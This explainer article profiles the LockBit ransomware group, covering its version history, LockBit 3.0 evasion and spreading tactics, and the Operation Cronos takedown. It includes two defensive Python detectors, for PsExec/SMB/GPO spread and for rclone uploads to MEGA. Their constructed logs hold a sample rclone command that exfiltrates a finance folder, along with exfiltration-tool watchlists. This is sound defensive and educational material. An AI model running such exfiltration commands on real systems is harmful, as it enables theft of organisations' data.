Lockbit is a notorious ransomware group known for its aggressive and sophisticated attacks. Originating in 2019, this group has rapidly become a significant threat, targeting corporations and government entities worldwide.
They organize their operations meticulously, establishing themselves as formidable threat actors in cyberspace.
Who is Lockbit?
Lockbit is a cybercriminal group engaged in deploying ransomware attacks.
They are responsible for numerous high-profile cybersecurity breaches, impacting businesses across various sectors.
The group operates on a ransomware-as-a-service (RaaS) model, allowing affiliates[1] to use their ransomware in exchange for a cut of the ransom payments. This structure has rapidly expanded their reach and impact.
How Does Lockbit Operate?
Initially, they gain access to a victim’s network through methods like phishing, exploiting vulnerabilities, or purchasing access from other criminals. Once inside, they move laterally across the network, identifying and encrypting valuable data.
The ransomware presents victims with a ransom note demanding payment for data decryption.
Lockbit evolution
The LockBit ransomware family has undergone a remarkable evolution since its initial emergence, demonstrating the adaptability and increasing sophistication of cyber threats.
Here’s a timeline outlining the major developments in the LockBit ransomware lineage:
September 2019: ABCD Ransomware Emergence
LockBit’s roots can be traced back to the appearance of ABCD ransomware. This ransomware laid the foundational code for future iterations of LockBit.
January 2020: LockBit Emergence
Discussions regarding a ransomware explicitly named “LockBit” began to surface on Russian-language cybercrime forums, marking the official introduction of this threatening malware into the cybercrime ecosystem.
June 2021: LockBit 2.0 (LockBit Red) Launch
LockBit evolved into its second major version, introducing StealBit, a tool designed for exfiltrating information before encryption, enhancing the double extortion threat.
October 2021: Linux-ESXi Locker Version 1.0 Release
LockBit expanded its attack vectors by developing a version capable of targeting Linux and VMware ESXi systems[2], thereby broadening its potential victim base.
March 2022: LockBit 2.0 Bugs Discovered
Identifying critical vulnerabilities in LockBit 2.0 prompted the developers to work on an updated version to address these flaws.
June 2022: LockBit 3.0 (LockBit Black) Debut
LockBit Black, the third iteration, addressed the issues identified in LockBit 2.0. Launched with visible influences from the BlackMatter and Alphv ransomware families, it showcased improved evasion capabilities.
September 2022: Builder Leak
LockBit faced a setback as the builder for LockBit 3.0 was leaked[3], allowing non-affiliated cybercriminals access to the ransomware, which potentially led to a wider spread of the malware.
January 2023: LockBit Green Introduction
This version marked the integration of source code[4] from Conti ransomware, indicating a trend of ransomware groups borrowing from each other to enhance their malicious toolsets.
April 2023: macOS Targeting
A significant development in LockBit’s capabilities was observed with the malware now targeting macOS systems[5], reflecting the continuous expansion of its target spectrum.
LockBit 3.0: Enhanced Evasiveness and Modularity
What sets LockBit 3.0 apart is its customizable nature; it allows for a multitude of behaviors tailored at the compilation stage[6], which can be further fine-tuned through command-line arguments upon execution.
This feature enables specific functionalities like intricate lateral movements and the initiation of Safe Mode during attacks.
A standout feature is its execution conditions. These include a mandatory password for affiliates who lack direct access to the ransomware.
This password acts as a cryptographic key. It renders the malware inactive and indecipherable without the correct input. This complicates detection and analysis by cybersecurity defenses.
The encrypted nature of the executable ensures that traditional signature-based detections are less effective, because each encrypted instance of the malware has a different file hash.
Moreover, it exhibits selectiveness in its targets based on system language settings. It avoids systems with languages from a predefined exclusion list, such as Romanian (Moldova), Arabic (Syria), and Tatar (Russia).
This tactic likely aims to sidestep systems in certain geographical regions. It reflects a strategic choice to avoid attention from specific countries’ law enforcement agencies.
Tactics for Initial Access and Spread
LockBit 3.0’s strategies for infiltrating networks are diverse. They leverage vulnerabilities through remote desktop protocol (RDP) exploitation, phishing, valid account misuse, and public-facing application vulnerabilities.
Once inside, the ransomware escalates privileges if necessary. It also conducts extensive reconnaissance to understand the environment fully before initiating its malicious activities.
The ransomware disrupts system operations by terminating relevant processes and services and manipulating system configurations to maintain control. It uses a mix of hardcoded credentials and compromised local accounts to spread through the network. It employs mechanisms like Group Policy Objects and PsExec in conjunction with the SMB protocol for efficient distribution.
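The spreading mechanisms named above (PsExec, Group Policy Objects and SMB admin shares) each leave a trace in Windows audit logs, and that is where a defender would look for them. The following detection logic is an added example written for this article, not code from LockBit, CISA or any vendor. It runs three rules over constructed, flattened event records: a 7045 service-installation event for the PSEXESVC service that PsExec installs by default, fan-out by one account to the ADMIN$ or C$ share on several hosts within a short window (event 5145), and a 5136/5137 directory-service change to a groupPolicyContainer object. The event shapes, host names, the ten-minute window and the three-host threshold are all assumptions chosen for the example.

```python
"""Detection rules for LockBit-style spreading via PsExec, SMB admin shares
and Group Policy changes, run over constructed Windows-event-like records.
Example code added for illustration; not from the article's sources."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (flattened fields, not real log exports).
SAMPLE_EVENTS = [
    {"time": "2024-02-18T01:02:03", "id": 4624, "host": "WS-01", "user": "CORP\\svc_backup",
     "src_ip": "10.0.0.5", "logon_type": 3},
    {"time": "2024-02-18T01:02:05", "id": 5145, "host": "WS-01", "user": "CORP\\svc_backup",
     "src_ip": "10.0.0.5", "share": "\\\\*\\ADMIN$", "target": "PSEXESVC.exe"},
    {"time": "2024-02-18T01:02:06", "id": 7045, "host": "WS-01",
     "service": "PSEXESVC", "image": "%SystemRoot%\\PSEXESVC.exe"},
    {"time": "2024-02-18T01:02:40", "id": 5145, "host": "WS-02", "user": "CORP\\svc_backup",
     "src_ip": "10.0.0.5", "share": "\\\\*\\ADMIN$", "target": "PSEXESVC.exe"},
    {"time": "2024-02-18T01:03:10", "id": 5145, "host": "FS-01", "user": "CORP\\svc_backup",
     "src_ip": "10.0.0.5", "share": "\\\\*\\C$", "target": "Windows\\Temp\\lb.exe"},
    {"time": "2024-02-18T01:05:00", "id": 5136, "host": "DC-01", "user": "CORP\\svc_backup",
     "object_class": "groupPolicyContainer", "attribute": "gPCMachineExtensionNames"},
    # Benign activity that must not be flagged: a user opening a normal file share.
    {"time": "2024-02-18T09:00:00", "id": 5145, "host": "FS-01", "user": "CORP\\alice",
     "src_ip": "10.0.1.20", "share": "\\\\*\\Projects", "target": "report.docx"},
]

ADMIN_SHARES = {"ADMIN$", "C$"}  # IPC$ is deliberately excluded (too noisy)


def parse_time(value):
    return datetime.fromisoformat(value)


def detect_psexec_service(events):
    """7045 service installs whose name or binary path mentions PSEXESVC."""
    return [
        {"rule": "psexec_service_install", "host": e["host"], "time": e["time"]}
        for e in events
        if e["id"] == 7045
        and "PSEXESVC" in (e.get("service", "") + e.get("image", "")).upper()
    ]


def detect_admin_share_fanout(events, min_hosts=3, window=timedelta(minutes=10)):
    """One (user, source IP) touching admin shares on >= min_hosts hosts in a window."""
    by_actor = defaultdict(list)
    for e in events:
        if e["id"] != 5145:
            continue
        share_name = e.get("share", "").rsplit("\\", 1)[-1].upper()
        if share_name in ADMIN_SHARES:
            by_actor[(e["user"], e["src_ip"])].append((parse_time(e["time"]), e["host"]))
    findings = []
    for (user, ip), hits in by_actor.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            hosts = {h for t, h in hits[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                findings.append({"rule": "admin_share_fanout", "user": user, "src_ip": ip,
                                 "hosts": sorted(hosts), "start": start.isoformat()})
                break  # one finding per actor is enough
    return findings


def detect_gpo_changes(events):
    """Directory-service change events (5136/5137) on GPO container objects."""
    return [
        {"rule": "gpo_modified", "user": e["user"], "host": e["host"],
         "attribute": e.get("attribute"), "time": e["time"]}
        for e in events
        if e["id"] in (5136, 5137) and e.get("object_class") == "groupPolicyContainer"
    ]


def analyze(events):
    """Run every rule and return the combined list of findings."""
    return (detect_psexec_service(events)
            + detect_admin_share_fanout(events)
            + detect_gpo_changes(events))


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

The fan-out rule is the one worth tuning per environment: backup agents and patch-management tools legitimately hit ADMIN$ on many hosts, so in practice the threshold is raised or those accounts are allow-listed rather than the rule being dropped.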
Exfiltration and Encryption
Before locking files, LockBit 3.0 exfiltrates valuable data using tools such as StealBit[7] and rclone[8], and uses publicly available services like MEGA as the destination for the stolen data.
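The exfiltration stage described above is detectable from two ordinary telemetry sources: process-creation records and outbound proxy logs. The script below is an added example written for this article (not LockBit, rclone or MEGA code); it correlates an rclone-style command line on a host (even when the binary has been renamed) with the volume of data that host sends to a watch-listed file-sharing domain. The proxy log format, the host-to-IP mapping, the 500 MiB threshold and the watchlist of MEGA domains are all assumptions constructed for the example.

```python
"""Correlate rclone-like process launches with bulk uploads to a
watch-listed file-sharing service. Example code added for illustration,
using constructed logs; not from the article's sources."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Assumed watchlist (MEGA's public domains); extend to match local policy.
WATCHLIST = ("mega.nz", "mega.co.nz")
OUT_BYTES_THRESHOLD = 500 * 1024 * 1024  # constructed tuning value: 500 MiB

# Constructed host-to-IP mapping, as an asset inventory or DHCP log would supply.
HOST_IPS = {"FS-01": "10.0.0.7", "WS-07": "10.0.1.20"}

# Constructed process-creation records. rclone has been renamed to rc.exe,
# but the 'copy <src> remote:path --transfers N' grammar gives it away.
PROCESS_EVENTS = [
    {"host": "FS-01", "user": "CORP\\svc_backup", "image": "C:\\Windows\\Temp\\rc.exe",
     "cmdline": "rc.exe copy D:\\Finance remote:lb --transfers 32 --config C:\\Windows\\Temp\\r.conf"},
    {"host": "WS-07", "user": "CORP\\bob", "image": "C:\\Program Files\\Git\\bin\\git.exe",
     "cmdline": "git push origin main"},
]

# Constructed proxy log: client_ip - - [timestamp] "METHOD URL PROTO" status bytes_out bytes_in
PROXY_LOG = """\
10.0.0.7 - - [18/Feb/2024:02:10:01 +0000] "POST https://g.api.mega.co.nz/cs HTTP/1.1" 200 312 1209
10.0.0.7 - - [18/Feb/2024:02:10:05 +0000] "PUT https://gfs270n123.userstorage.mega.co.nz/ul/abc HTTP/1.1" 200 734003200 88
10.0.0.7 - - [18/Feb/2024:02:14:33 +0000] "PUT https://gfs270n123.userstorage.mega.co.nz/ul/abc HTTP/1.1" 200 268435456 88
10.0.1.20 - - [18/Feb/2024:09:01:12 +0000] "GET https://mega.nz/ HTTP/1.1" 200 1024 15233
10.0.1.20 - - [18/Feb/2024:09:05:00 +0000] "GET https://www.example.com/ HTTP/1.1" 200 512 4096
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d+) (?P<out>\d+) (?P<in>\d+)$'
)


def detect_sync_tool(process_events):
    """Hosts where an rclone-like command ran, by name or by command grammar."""
    hosts = set()
    for e in process_events:
        text = (e["image"] + " " + e["cmdline"]).lower()
        subcommand = re.search(r"\b(copy|sync|move)\b", text)
        # rclone remote syntax 'name:path'; two-plus chars before the colon
        # so that Windows drive letters such as 'd:\\' do not match.
        remote = re.search(r"\s[a-z0-9_-]{2,}:\S*", text)
        if "rclone" in text or (subcommand and remote):
            hosts.add(e["host"])
    return hosts


def summarize_egress(proxy_log):
    """Bytes sent per (client IP, watchlist domain), parents included."""
    totals = defaultdict(int)
    for line in proxy_log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than crash the pipeline
        host = urlsplit(m["url"]).hostname or ""
        for domain in WATCHLIST:
            if host == domain or host.endswith("." + domain):
                totals[(m["ip"], domain)] += int(m["out"])
    return dict(totals)


def detect_exfil(process_events, proxy_log, host_ips, threshold=OUT_BYTES_THRESHOLD):
    """Flag hosts pushing more than `threshold` bytes to a watch-listed domain;
    severity is raised when a sync tool was also seen on that host."""
    tool_hosts = detect_sync_tool(process_events)
    ip_to_host = {ip: h for h, ip in host_ips.items()}
    findings = []
    for (ip, domain), sent in sorted(summarize_egress(proxy_log).items()):
        if sent < threshold:
            continue
        host = ip_to_host.get(ip, ip)
        findings.append({"host": host, "domain": domain, "bytes_out": sent,
                         "severity": "high" if host in tool_hosts else "medium"})
    return findings


if __name__ == "__main__":
    for finding in detect_exfil(PROCESS_EVENTS, PROXY_LOG, HOST_IPS):
        print(finding)
```

Keying the volume rule on bytes the client sends (not receives) is what separates an upload from ordinary browsing of the same site, which is why the workstation that merely visited mega.nz stays below the threshold here.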
Operation Cronos
The operation, announced in February 2024[9], resulted in the seizure of LockBit’s infrastructure and the indictment of its members, marking a substantial blow to one of the most active ransomware groups worldwide.
Notably, this disruption has enabled the retrieval of decryption keys, offering a lifeline to the over 2,000 victims[10] worldwide affected by LockBit’s ransom demands, which cumulatively ran into hundreds of millions of dollars.
The operation led to the arrest of two members in Poland and Ukraine, and the seizure of LockBit’s servers[11].
Ivan Kondratyev[12] and Artur Sungatov[13] were charged with conspiring to commit LockBit-powered ransomware attacks.
The indictment unveiled the identities of the alleged perpetrators, erasing the veil of anonymity associated with cyber attacks. It sends a resounding message[14] that online actions leave a digital trail, with consequences awaiting those involved.
References
[1] https://www.cisa.gov/sites/default/files/2023-06/aa23-165a_understanding_TA_LockBit_0.pdf
[2] https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html
[3] https://analyst1.com/ransomware-diaries-volume-1/
[4] https://cybernews.com/security/lockbit-ransomware-gang-releases-lockbit-green-version/
[5] https://www.wired.com/story/apple-mac-lockbit-ransomware-samples/
[6] https://www.cisa.gov/sites/default/files/2023-03/aa23-075a-stop-ransomware-lockbit.pdf
[7] https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool
[8] https://rclone.org/
[9] https://www.justice.gov/opa/pr/us-and-uk-disrupt-lockbit-ransomware-variant
[10] https://www.aha.org/news/headline/2024-02-20-agencies-seize-lockbit-ransomware-servers-offer-encryption-keys
[11] https://www.reuters.com/technology/cybersecurity/us-indicts-two-russian-nationals-lockbit-cybercrime-gang-bust-2024-02-20/
[12] https://www.justice.gov/usao-ndca/media/1338976/dl?inline
[13] https://www.justice.gov/usao-nj/media/1338926/dl?inline
[14] https://www.justice.gov/usao-nj/media/1338931/dl?inline